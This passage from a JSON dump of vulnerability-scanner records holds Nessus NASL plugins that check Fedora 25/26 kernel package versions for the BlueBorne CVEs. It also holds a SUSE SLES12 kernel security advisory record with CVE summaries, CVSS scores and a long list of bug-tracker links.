value:\"2017/09/18\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^26([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 26\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2017-1000251\", \"CVE-2017-12153\", \"CVE-2017-12154\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for FEDORA-2017-7369ea045c\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\nif (rpm_check(release:\"FC26\", reference:\"kernel-4.12.13-300.fc26\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:14:10", "description": "The 4.12.13 stable kernel update contains a number of important fixes\nacross the tree.\n\n----\n\nThe 4.12.12 stable kernel update contains a number of important fixes\nacross the tree.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 20, "cvss3": {"score": 8.8, "vector": "AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-09-22T00:00:00", "title": "Fedora 25 : kernel (2017-e07d7fb18e) (BlueBorne)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-1000251", "CVE-2017-12153", "CVE-2017-12154"], 
"modified": "2017-09-22T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:kernel", "cpe:/o:fedoraproject:fedora:25"], "id": "FEDORA_2017-E07D7FB18E.NASL", "href": "https://www.tenable.com/plugins/nessus/103394", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-e07d7fb18e.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103394);\n script_version(\"3.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-1000251\", \"CVE-2017-12153\", \"CVE-2017-12154\");\n script_xref(name:\"FEDORA\", value:\"2017-e07d7fb18e\");\n\n script_name(english:\"Fedora 25 : kernel (2017-e07d7fb18e) (BlueBorne)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The 4.12.13 stable kernel update contains a number of important fixes\nacross the tree.\n\n----\n\nThe 4.12.12 stable kernel update contains a number of important fixes\nacross the tree.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-e07d7fb18e\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n 
script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:25\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/22\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^25([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 25\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2017-1000251\", \"CVE-2017-12153\", \"CVE-2017-12154\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for FEDORA-2017-e07d7fb18e\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\nif (rpm_check(release:\"FC25\", reference:\"kernel-4.12.13-200.fc25\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T14:26:50", "description": "The SUSE Linux Enterprise 12 SP3 kernel was updated to 4.4.92 to\nreceive various security and bugfixes. 
The following security bugs\nwere fixed :\n\n - CVE-2017-1000252: The KVM subsystem in the Linux kernel\n allowed guest OS users to cause a denial of service\n (assertion failure, and hypervisor hang or crash) via an\n out-of bounds guest_irq value, related to\n arch/x86/kvm/vmx.c and virt/kvm/eventfd.c (bnc#1058038).\n\n - CVE-2017-11472: The acpi_ns_terminate() function in\n drivers/acpi/acpica/nsutils.c in the Linux kernel did\n not flush the operand cache and causes a kernel stack\n dump, which allowed local users to obtain sensitive\n information from kernel memory and bypass the KASLR\n protection mechanism (in the kernel through 4.9) via a\n crafted ACPI table (bnc#1049580).\n\n - CVE-2017-12134: The xen_biovec_phys_mergeable function\n in drivers/xen/biomerge.c in Xen might allow local OS\n guest users to corrupt block device data streams and\n consequently obtain sensitive memory information, cause\n a denial of service, or gain host OS privileges by\n leveraging incorrect block IO merge-ability calculation\n (bnc#1051790 bsc#1053919).\n\n - CVE-2017-12153: A security flaw was discovered in the\n nl80211_set_rekey_data() function in\n net/wireless/nl80211.c in the Linux kernel. This function\n did not check whether the required attributes are\n present in a Netlink request. 
This request can be issued\n by a user with the CAP_NET_ADMIN capability and may\n result in a NULL pointer dereference and system crash\n (bnc#1058410).\n\n - CVE-2017-12154: The prepare_vmcs02 function in\n arch/x86/kvm/vmx.c in the Linux kernel did not ensure\n that the 'CR8-load exiting' and 'CR8-store exiting' L0\n vmcs02 controls exist in cases where L1 omits the 'use\n TPR shadow' vmcs12 control, which allowed KVM L2 guest\n OS users to obtain read and write access to the hardware\n CR8 register (bnc#1058507).\n\n - CVE-2017-13080: Wi-Fi Protected Access (WPA and WPA2)\n allowed reinstallation of the Group Temporal Key (GTK)\n during the group key handshake, allowing an attacker\n within radio range to replay frames from access points\n to clients (bnc#1056061 1063479 1063667 1063671).\n\n - CVE-2017-14051: An integer overflow in the\n qla2x00_sysfs_write_optrom_ctl function in\n drivers/scsi/qla2xxx/qla_attr.c in the Linux kernel\n allowed local users to cause a denial of service (memory\n corruption and system crash) by leveraging root access\n (bnc#1056588).\n\n - CVE-2017-14106: The tcp_disconnect function in\n net/ipv4/tcp.c in the Linux kernel allowed local users\n to cause a denial of service (__tcp_select_window\n divide-by-zero error and system crash) by triggering a\n disconnect within a certain tcp_recvmsg code path\n (bnc#1056982).\n\n - CVE-2017-14489: The iscsi_if_rx function in\n drivers/scsi/scsi_transport_iscsi.c in the Linux kernel\n allowed local users to cause a denial of service (panic)\n by leveraging incorrect length validation (bnc#1059051).\n\n - CVE-2017-15265: Use-after-free vulnerability in the\n Linux kernel before 4.14-rc5 allowed local users to have\n unspecified impact via vectors related to /dev/snd/seq\n (bnc#1062520).\n\n - CVE-2017-15649: net/packet/af_packet.c in the Linux\n kernel allowed local users to gain privileges via\n crafted system calls that trigger mishandling of\n packet_fanout data structures, because of a 
race\n condition (involving fanout_add and packet_do_bind) that\n leads to a use-after-free, a different vulnerability\n than CVE-2017-6346 (bnc#1064388).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 36, "cvss3": {"score": 8.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"}, "published": "2017-10-26T00:00:00", "title": "SUSE SLED12 / SLES12 Security Update : kernel (SUSE-SU-2017:2847-1) (KRACK)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-14051", "CVE-2017-13080", "CVE-2017-14489", "CVE-2017-15265", "CVE-2017-15649", "CVE-2017-1000252", "CVE-2017-11472", "CVE-2017-14106", "CVE-2017-12134", "CVE-2017-12153", "CVE-2017-6346", "CVE-2017-12154"], "modified": "2017-10-26T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:kernel-default-debugsource", "cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:kernel-syms", "p-cpe:/a:novell:suse_linux:kernel-default-base-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-base", "p-cpe:/a:novell:suse_linux:kernel-default-extra", "p-cpe:/a:novell:suse_linux:kernel-default-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-extra-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-devel", "p-cpe:/a:novell:suse_linux:kernel-default-man", "p-cpe:/a:novell:suse_linux:kernel-default"], "id": "SUSE_SU-2017-2847-1.NASL", "href": "https://www.tenable.com/plugins/nessus/104171", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:2847-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif 
(description)\n{\n script_id(104171);\n script_version(\"3.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-1000252\", \"CVE-2017-11472\", \"CVE-2017-12134\", \"CVE-2017-12153\", \"CVE-2017-12154\", \"CVE-2017-13080\", \"CVE-2017-14051\", \"CVE-2017-14106\", \"CVE-2017-14489\", \"CVE-2017-15265\", \"CVE-2017-15649\", \"CVE-2017-6346\");\n script_xref(name:\"IAVA\", value:\"2017-A-0310\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : kernel (SUSE-SU-2017:2847-1) (KRACK)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The SUSE Linux Enterprise 12 SP3 kernel was updated to 4.4.92 to\nreceive various security and bugfixes. The following security bugs\nwere fixed :\n\n - CVE-2017-1000252: The KVM subsystem in the Linux kernel\n allowed guest OS users to cause a denial of service\n (assertion failure, and hypervisor hang or crash) via an\n out-of bounds guest_irq value, related to\n arch/x86/kvm/vmx.c and virt/kvm/eventfd.c (bnc#1058038).\n\n - CVE-2017-11472: The acpi_ns_terminate() function in\n drivers/acpi/acpica/nsutils.c in the Linux kernel did\n not flush the operand cache and causes a kernel stack\n dump, which allowed local users to obtain sensitive\n information from kernel memory and bypass the KASLR\n protection mechanism (in the kernel through 4.9) via a\n crafted ACPI table (bnc#1049580).\n\n - CVE-2017-12134: The xen_biovec_phys_mergeable function\n in drivers/xen/biomerge.c in Xen might allow local OS\n guest users to corrupt block device data streams and\n consequently obtain sensitive memory information, cause\n a denial of service, or gain host OS privileges by\n leveraging incorrect block IO merge-ability calculation\n (bnc#1051790 
bsc#1053919).\n\n - CVE-2017-12153: A security flaw was discovered in the\n nl80211_set_rekey_data() function in\n net/wireless/nl80211.c in the Linux kernel. This function\n did not check whether the required attributes are\n present in a Netlink request. This request can be issued\n by a user with the CAP_NET_ADMIN capability and may\n result in a NULL pointer dereference and system crash\n (bnc#1058410).\n\n - CVE-2017-12154: The prepare_vmcs02 function in\n arch/x86/kvm/vmx.c in the Linux kernel did not ensure\n that the 'CR8-load exiting' and 'CR8-store exiting' L0\n vmcs02 controls exist in cases where L1 omits the 'use\n TPR shadow' vmcs12 control, which allowed KVM L2 guest\n OS users to obtain read and write access to the hardware\n CR8 register (bnc#1058507).\n\n - CVE-2017-13080: Wi-Fi Protected Access (WPA and WPA2)\n allowed reinstallation of the Group Temporal Key (GTK)\n during the group key handshake, allowing an attacker\n within radio range to replay frames from access points\n to clients (bnc#1056061 1063479 1063667 1063671).\n\n - CVE-2017-14051: An integer overflow in the\n qla2x00_sysfs_write_optrom_ctl function in\n drivers/scsi/qla2xxx/qla_attr.c in the Linux kernel\n allowed local users to cause a denial of service (memory\n corruption and system crash) by leveraging root access\n (bnc#1056588).\n\n - CVE-2017-14106: The tcp_disconnect function in\n net/ipv4/tcp.c in the Linux kernel allowed local users\n to cause a denial of service (__tcp_select_window\n divide-by-zero error and system crash) by triggering a\n disconnect within a certain tcp_recvmsg code path\n (bnc#1056982).\n\n - CVE-2017-14489: The iscsi_if_rx function in\n drivers/scsi/scsi_transport_iscsi.c in the Linux kernel\n allowed local users to cause a denial of service (panic)\n by leveraging incorrect length validation (bnc#1059051).\n\n - CVE-2017-15265: Use-after-free vulnerability in the\n Linux kernel before 4.14-rc5 allowed local users to have\n unspecified impact via 
vectors related to /dev/snd/seq\n (bnc#1062520).\n\n - CVE-2017-15649: net/packet/af_packet.c in the Linux\n kernel allowed local users to gain privileges via\n crafted system calls that trigger mishandling of\n packet_fanout data structures, because of a race\n condition (involving fanout_add and packet_do_bind) that\n leads to a use-after-free, a different vulnerability\n than CVE-2017-6346 (bnc#1064388).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1004527\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1005776\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1005778\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1005780\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1005781\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1012382\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1012829\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1015342\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1015343\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1019675\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://bugzilla.suse.com/show_bug.cgi?id=1019680\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1019695\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1019699\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1020412\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1020645\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1020657\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1020989\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1021424\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1022595\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1022604\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1022743\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1022912\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1022967\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1024346\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1024373\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1024405\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1025461\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://bugzilla.suse.com/show_bug.cgi?id=1030850\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1031717\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1031784\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1032150\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1034048\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1034075\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1035479\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1036060\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1036215\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1036737\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1037579\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1037838\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1037890\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1038583\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1040813\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1042847\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1043598\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://bugzilla.suse.com/show_bug.cgi?id=1044503\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1046529\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1047238\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1047487\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1047989\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1048155\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1048228\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1048325\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1048327\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1048356\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1048501\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1048893\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1048912\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1048934\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1049226\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1049272\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1049291\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://bugzilla.suse.com/show_bug.cgi?id=1049336\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1049361\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1049580\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1050471\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1050742\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1051790\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1051987\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1052093\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1052094\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1052095\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1052360\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1052384\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1052580\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1052593\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1052888\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1053043\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1053309\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://bugzilla.suse.com/show_bug.cgi?id=1053472\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1053627\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1053629\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1053633\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1053681\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1053685\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1053802\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1053915\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1053919\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1054082\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1054084\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1054654\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1055013\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1055096\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1055272\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1055290\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1055359\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
